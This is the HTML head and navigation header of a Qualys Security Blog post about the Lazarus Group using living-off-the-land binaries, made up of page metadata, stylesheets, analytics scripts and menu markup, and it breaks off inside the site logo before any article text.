CINXE.COM

<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11">  <script> var _prum = [['id', '56a14edeabe53deb7ff24334'], ['mark', 'firstbyte', (new Date()).getTime()]]; (function() { var s = document.getElementsByTagName('script')[0] , p = document.createElement('script'); p.async = 'async'; p.src = '//rum-static.pingdom.net/prum.min.js'; s.parentNode.insertBefore(p, s); })(); </script>  <title>LolZarus: Lazarus Group Incorporating Lolbins into Campaigns | Qualys Security Blog</title> <script data-no-defer="1" data-ezscrex="false" data-cfasync="false" data-pagespeed-no-defer data-cookieconsent="ignore"> var ctPublicFunctions = {"_ajax_nonce":"0e06bd0114","_rest_nonce":"4e518c68f2","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/blog.qualys.com\/wp-json\/","data__cookies_type":"none","data__ajax_type":"admin_ajax","text__wait_for_decoding":"Decoding the contact data, let us a few seconds to finish. Anti-Spam by CleanTalk","cookiePrefix":"","wprocket_detected":false} </script> <script data-no-defer="1" data-ezscrex="false" data-cfasync="false" data-pagespeed-no-defer data-cookieconsent="ignore"> var ctPublic = {"_ajax_nonce":"0e06bd0114","settings__forms__check_internal":"0","settings__forms__check_external":"1","settings__forms__search_test":"1","settings__data__bot_detector_enabled":"1","blog_home":"https:\/\/blog.qualys.com\/","pixel__setting":"3","pixel__enabled":false,"pixel__url":"https:\/\/moderate1-v4.cleantalk.org\/pixel\/dba09330c14be9bf43dfb2fba6d7f545.gif","data__email_check_before_post":"1","data__cookies_type":"none","data__key_is_ok":true,"data__visible_fields_required":true,"wl_brandname":"Anti-Spam by CleanTalk","wl_brandname_short":"CleanTalk","ct_checkjs_key":366396619,"emailEncoderPassKey":"9f656c94809af4b53927701d5cba3a56","bot_detector_forms_excluded":"W10=","advancedCacheExists":false,"varnishCacheExists":false,"wc_ajax_add_to_cart":false} </script>  <link rel="canonical" href="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" /> <meta property="og:type" content="article" /> <meta property="og:locale" content="en_US" /> <meta property="og:site_name" content="Qualys Security Blog" /> <meta property="og:title" content="LolZarus: Lazarus Group Incorporating Lolbins into Campaigns | Qualys Security Blog" /> <meta property="og:url" content="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns" /> <meta property="og:image" content="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png" /> <meta property="article:published_time" content="2022-02-08T11:24:37+00:00" /> <meta property="article:modified_time" content="2022-12-23T08:09:48+00:00" /> <meta property="article:publisher" content="https://www.facebook.com/qualys" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:site" content="@qualys" /> <meta name="twitter:title" content="LolZarus: Lazarus Group Incorporating Lolbins into Campaigns | Qualys Security Blog" /> <meta name="twitter:image" content="https://ik.imagekit.io/qualys/wp-content/uploads/2022/02/Fig1.png" /> <script type="application/ld+json">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://blog.qualys.com/#/schema/WebSite","url":"https://blog.qualys.com/","name":"Qualys Security Blog","alternateName":"Qualys, Inc.","description":"Expert network security guidance and news","inLanguage":"en-US","potentialAction":{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://blog.qualys.com/search/{search_term_string}"},"query-input":"required name=search_term_string"},"publisher":{"@type":"Organization","@id":"https://blog.qualys.com/#/schema/Organization","name":"Qualys, Inc.","url":"https://blog.qualys.com/","sameAs":["https://www.facebook.com/qualys","https://twitter.com/qualys","https://www.youtube.com/user/QualysGuard","https://www.linkedin.com/company/qualys"],"logo":{"@type":"ImageObject","url":"https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys.png","contentUrl":"https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys.png","width":512,"height":512}}},{"@type":"WebPage","@id":"https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns","url":"https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns","name":"LolZarus: Lazarus Group Incorporating Lolbins into Campaigns | Qualys Security Blog","inLanguage":"en-US","isPartOf":{"@id":"https://blog.qualys.com/#/schema/WebSite"},"breadcrumb":{"@type":"BreadcrumbList","@id":"https://blog.qualys.com/#/schema/BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":"https://blog.qualys.com/","name":"Qualys Security Blog"},{"@type":"ListItem","position":2,"item":"https://blog.qualys.com/category/vulnerabilities-threat-research","name":"Category: Vulnerabilities and Threat Research"},{"@type":"ListItem","position":3,"name":"LolZarus: Lazarus Group Incorporating Lolbins into Campaigns"}]},"potentialAction":{"@type":"ReadAction","target":"https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns"},"datePublished":"2022-02-08T11:24:37+00:00","dateModified":"2022-12-23T08:09:48+00:00","author":{"@type":"Person","@id":"https://blog.qualys.com/#/schema/Person/2e9e1e371053521b97e01a452b121dbe","name":"Akshat Pradhan","description":"Senior Engineer, Threat Research..."}}]}</script>  <link rel='dns-prefetch' href='//moderate.cleantalk.org' /> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//static.cloud.coveo.com' /> <link rel='dns-prefetch' href='//stats.wp.com' /> <link rel='dns-prefetch' href='//v0.wordpress.com' /> <link rel="alternate" type="application/rss+xml" title="Qualys Security Blog » Feed" href="https://blog.qualys.com/feed" /> <link rel="alternate" type="application/rss+xml" title="Qualys Security Blog » Comments Feed" href="https://blog.qualys.com/comments/feed" /> <link rel="alternate" type="application/rss+xml" title="Qualys Security Blog » LolZarus: Lazarus Group Incorporating Lolbins into Campaigns Comments Feed" href="https://blog.qualys.com/vulnerabilities-threat-research/2022/02/08/lolzarus-lazarus-group-incorporating-lolbins-into-campaigns/feed" /> <link rel='stylesheet' id='jetpack_related-posts-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/modules/related-posts/related-posts.css?ver=20240116' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://ik.imagekit.io/qualys/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://ik.imagekit.io/qualys/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://ik.imagekit.io/qualys/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.6.2' media='all' /> <style id='jetpack-sharing-buttons-style-inline-css'> .jetpack-sharing-buttons__services-list{display:flex;flex-direction:row;flex-wrap:wrap;gap:0;list-style-type:none;margin:5px;padding:0}.jetpack-sharing-buttons__services-list.has-small-icon-size{font-size:12px}.jetpack-sharing-buttons__services-list.has-normal-icon-size{font-size:16px}.jetpack-sharing-buttons__services-list.has-large-icon-size{font-size:24px}.jetpack-sharing-buttons__services-list.has-huge-icon-size{font-size:36px}@media print{.jetpack-sharing-buttons__services-list{display:none!important}}.editor-styles-wrapper .wp-block-jetpack-sharing-buttons{gap:0;padding-inline-start:0}ul.jetpack-sharing-buttons__services-list.has-background{padding:1.25em 2.375em} </style> <style id='classic-theme-styles-inline-css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='ct_public_css-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/cleantalk-spam-protect/css/cleantalk-public.min.css?ver=6.42.1' media='all' /> <link rel='stylesheet' id='community-shared-css' href='https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/style/shared.css?ver=1.0.3' media='all' /> <link rel='stylesheet' id='community-shared-30em-css' href='https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/style/shared-min-30em.css?ver=1.0.3' media='screen and (min-width: 30em)' /> <link rel='stylesheet' id='community-shared-60em-css' href='https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/style/shared-min-60em.css?ver=1.0.3' media='screen and (min-width: 60em)' /> <link rel='stylesheet' id='qualys2020-style-css' href='https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/style.css?ver=1.0.3' media='all' /> <link rel='stylesheet' id='qualys2020-highlightjs-dark-css' href='https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/styles/a11y-dark.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='coveo-css' href='https://static.cloud.coveo.com/searchui/v2.10085/2/css/CoveoFullSearch.min.css?ver=6.6.2' media='all' integrity='sha512-SvJKQ8/gNL2d8gVWx23GajIUPZAK+F83AI2pXl+pV0X3BfK6R3uBpEHo8CDv1YuIFzfvfs6znp77Amaj3te0xQ==' crossorigin='anonymous' /> <link rel='stylesheet' id='fancybox-styles-css' href='https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css?ver=6.6.2' media='all' /> <script id="jetpack_related-posts-js-extra"> var related_posts_js_options = {"post_heading":"h4"}; </script> <script src="https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20240116" id="jetpack_related-posts-js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js" id="jquery-js" integrity='sha512-bLT0Qm9VnAYZDflyKcBaQ2gg0hSYNQrJ8RilYldYQ1FxQYoCLtUjuuRuZo+fjqhx/qtq/1itJ0C2ejDxltZVFg==' crossorigin='anonymous' referrerpolicy='no-referrer'></script> <script data-pagespeed-no-defer src="https://ik.imagekit.io/qualys/wp-content/plugins/cleantalk-spam-protect/js/apbct-public-bundle.min.js?ver=6.42.1" id="ct_public_functions-js"></script> <script src="https://moderate.cleantalk.org/ct-bot-detector-wrapper.js?ver=6.42.1" id="ct_bot_detector-js"></script> <script src="https://ik.imagekit.io/qualys/wp-includes/js/codemirror/codemirror.min.js?ver=5.29.1-alpha-ee20357" id="wp-codemirror-js"></script> <link rel="https://api.w.org/" href="https://blog.qualys.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://blog.qualys.com/wp-json/wp/v2/posts/29363" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://blog.qualys.com/xmlrpc.php?rsd" /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://blog.qualys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://blog.qualys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns&format=xml" /> <style>img#wpstats{display:none}</style> <link rel="icon" href="https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys-150x150.png" sizes="32x32" /> <link rel="icon" href="https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys-300x300.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys-300x300.png" /> <meta name="msapplication-TileImage" content="https://ik.imagekit.io/qualys/wp-content/uploads/2017/07/cropped-qualys-300x300.png" /> <style id="wp-custom-css"> .custom-testimonial-block { background: #1D2737; padding: 60px 40px; display: flex; align-items: flex-start; flex-direction: column; } .custom-testimonial-block .wp-block-media-text__media { align-self: flex-start; max-width: 200px; margin: 0 0 40px; } .custom-testimonial-block .wp-block-media-text__content { direction: inherit; padding: 0 0; font-style: italic; font-weight: 500; } .custom-testimonial-block .wp-block-media-text__content blockquote.wp-block-quote { padding: 0 0 0 40px; margin: 0; position: relative; color: #FFF; } .custom-testimonial-block .wp-block-media-text__content blockquote.wp-block-quote::before { content: ""; position: absolute; left: 0; top: 0; width: 36px; height: 27px; background: url(https://ik.imagekit.io/qualys/image/quote-marks-red.svg) left top no-repeat transparent; display: block; } .custom-testimonial-block .wp-block-media-text__content blockquote.wp-block-quote cite { font-family: Gotham, sans-serif; font-style: normal; font-size: 16px; display: block; line-height: 1.45; color: #FFF; } .custom-testimonial-block .wp-block-media-text__content p { color: #FFF; font-weight: 600; font-style: italic; } @media (min-width: 600px) { .custom-testimonial-block { flex-direction: row; } .custom-testimonial-block .wp-block-media-text__media { max-width: unset; margin: 0; } .custom-testimonial-block .wp-block-media-text__content blockquote.wp-block-quote { margin: 0 0 0 20px; padding: 0 40px; } } </style>  <script> if (!window.location.search.match(/[?&;]dnt=1([;&]|$)/)) { (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-W7DWPS'); } </script>  </head> <body class="post-template-default single single-post postid-29363 single-format-standard">  <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-W7DWPS" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>   <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-W7DWPS" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>  <div class="q-header__background"> <header class="q-header site-header" id="masthead"> <div class="q-header__container"> <div class="q-hamberger-menu"> <div class="q-hamburger-menu__icon"> <svg width="23" height="23" viewBox="0 0 23 23" version="1.1" xmlns="http://www.w3.org/2000/svg"> <g fill="currentColor"> <rect id="Rectangle1" x="0" y="5" width="23" height="3" rx="1.5"></rect> <rect id="Rectangle2" x="0" y="10" width="23" height="3" rx="1.5"></rect> <rect id="Rectangle3" x="0" y="15" width="23" height="3" rx="1.5"></rect> </g> </svg> </div> <div class="q-hamburger-menu__container"> <ul id="primary-menu" class="q-header__nav"><li id="menu-item-26462" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-26462 q-navigation__item"><a href="https://success.qualys.com/discussions/s/">Discussions</a> <ul class="sub-menu q-header__nav-sub"> <li id="menu-item-26463" class="q-header__nav-back menu-item menu-item-type-custom menu-item-object-custom menu-item-26463 q-navigation__item"><a href="#back">Back to main menu</a></li> <li id="menu-item-26464" class="q-browser-by-topic menu-item menu-item-type-custom menu-item-object-custom menu-item-26464 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/">BROWSE BY TOPIC</a><span class="menu-item-description">BROWSE BY TOPIC</span></li> <li id="menu-item-26465" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26465 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRIWA4/asset-management">Global IT Asset Management</a></li> <li id="menu-item-26466" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26466 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRwWAO/it-security">IT Security</a></li> <li id="menu-item-26467" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26467 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIS1WAO/compliance">Compliance</a></li> <li id="menu-item-26468" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26468 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRnWAO/cloud-container">Cloud & Container Security</a></li> <li id="menu-item-26469" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26469 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HISCWA4/web-app-security">Web App Security</a></li> <li id="menu-item-26470" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26470 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRfWAO/certificate-security">Certificate Security & SSL Labs</a></li> <li id="menu-item-26471" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26471 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIR8WAO/developer">Developer API</a></li> <li id="menu-item-26562" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26562 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/topic/0TO2L000000HIRAWA4/qualys-cloud-platform">Cloud Platform</a></li> <li id="menu-item-26472" class="q-button__start-a-discussion q-button__light-blue q-button-with-arrow menu-item menu-item-type-custom menu-item-object-custom menu-item-26472 q-navigation__item"><a href="https://qualys-secure.force.com/discussions/s/#start-a-discussion">Start a discussion</a></li> </ul> </li> <li id="menu-item-26473" class="q-header_blog-link menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-26473 q-navigation__item"><a href="https://blog.qualys.com/">Blog</a></li> <li id="menu-item-26474" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26474 q-navigation__item"><a href="https://www.qualys.com/training/">Training</a></li> <li id="menu-item-26475" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26475 q-navigation__item"><a href="https://www.qualys.com/documentation/">Docs</a></li> <li id="menu-item-26476" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26476 q-navigation__item"><a href="https://success.qualys.com/customersupport/">Support</a></li> <li id="menu-item-35252" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-35252 q-navigation__item"><a href="https://success.qualys.com/support/s/standards">Trust</a></li> <li class="q-header__nav-underline"></li></ul> </div> </div> <a class="q-header__logo q-header__logo-community" href="https://community.qualys.com/" title="Qualys Community"> <span class="q-logo-shield"> <svg width="111" height="35" alt="Qualys" class="q-logo__horizontal" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 933.884 293.111"><path d="M123.073 0c80.158 0 120.462 42.888 120.462 42.888s4.608 31.746 1.667 95.667c-4.443 96.56-122.1 154.55-122.111 154.556s-117.666-57.996-122.11-154.556c-2.941-63.921 1.667-95.667 1.667-95.667s40.268-42.888 120.425-42.888z" fill="#ed2e26"/><path d="M394.178 75.824a70.586 70.586 0 0 0-70.506 70.506c0 23.533 9.89 44.5 28.6 60.641 17.522 15.113 42.649 25.532 71.66 30.36 4.149-2.279 11.994-9.969 14.492-15.236-21.375-3.687-31.178-7.346-31.178-7.346a40.676 40.676 0 0 0 8.23-1.652c28.556-8.009 49.489-36.214 49.208-66.766-.357-38.876-31.628-70.507-70.506-70.507zm0 120.714a50.208 50.208 0 1 1 50.209-50.208 50.265 50.265 0 0 1-50.209 50.208zM915.488 189.828a11.292 11.292 0 0 1 15.377 0 11.587 11.587 0 0 1 0 15.6 11.3 11.3 0 0 1-15.377 0 11.587 11.587 0 0 1 0-15.6zm1.556 14.095a8.969 8.969 0 0 0 12.264 0 9.539 9.539 0 0 0 0-12.609 9.025 9.025 0 0 0-12.264 0 9.544 9.544 0 0 0 0 12.609zm10.708-9.106a3.558 3.558 0 0 1-2.654 3.568l3.066 4.806h-2.381l-2.791-4.668h-1.418v4.668h-2.014v-11.9h4.393a3.924 3.924 0 0 1 2.747.963 3.3 3.3 0 0 1 1.052 2.562zm-6.178-1.65v3.479h2.106a2.06 2.06 0 0 0 1.44-.481 1.622 1.622 0 0 0 .526-1.258q0-1.738-1.966-1.739zM784.087 178.724l-23.814-63.187h-21.219l34.746 88.2s-15.371 36.539-15.365 36.536c10.113 0 21.176-.714 25.5-11.37 10.152-24.993 45.505-113.365 45.505-113.365h-21.221zM704.493 210.246s19.7-.365 19.7-13.729v-120.033h-19.7zM663.646 127.976c-5.485-7.649-16.2-15.073-31.971-15.073-26.92 0-47.221 20.937-47.221 48.7 0 12.977 4.437 25.036 12.494 33.955 8.715 9.649 20.724 14.748 34.727 14.748 13.567 0 25.184-5.534 31.971-15.014v14.951s19.7-.312 19.7-13.719v-80.99h-19.7zm-29.5 63.789c-11.908 0-29.72-7.947-30-29.839v-.157c0-17.288 12.754-30.325 29.666-30.325 12.633 0 22.9 6.6 27.487 17.711a27.268 27.268 0 0 1 2.509 12.733 32.62 32.62 0 0 1-3.023 12.869c-4.633 10.65-14.595 17.008-26.641 17.008zM548.568 166.874c0 15.9-8.26 24.745-23.244 24.891-15.2 0-22.587-8.627-22.587-26.373v-49.855h-19.695v53.806c0 7.767 1.309 18.842 7.548 27.506 6.375 8.854 16.452 13.382 29.945 13.459h.553c16.138 0 24.448-7.315 28.468-13v12.934s18.707-.319 18.707-13.062v-81.643h-19.7zM876.661 152.965c-10.235-4.424-17.676-8.25-17.545-14.185.087-3.927 5.259-7.687 10.637-7.5 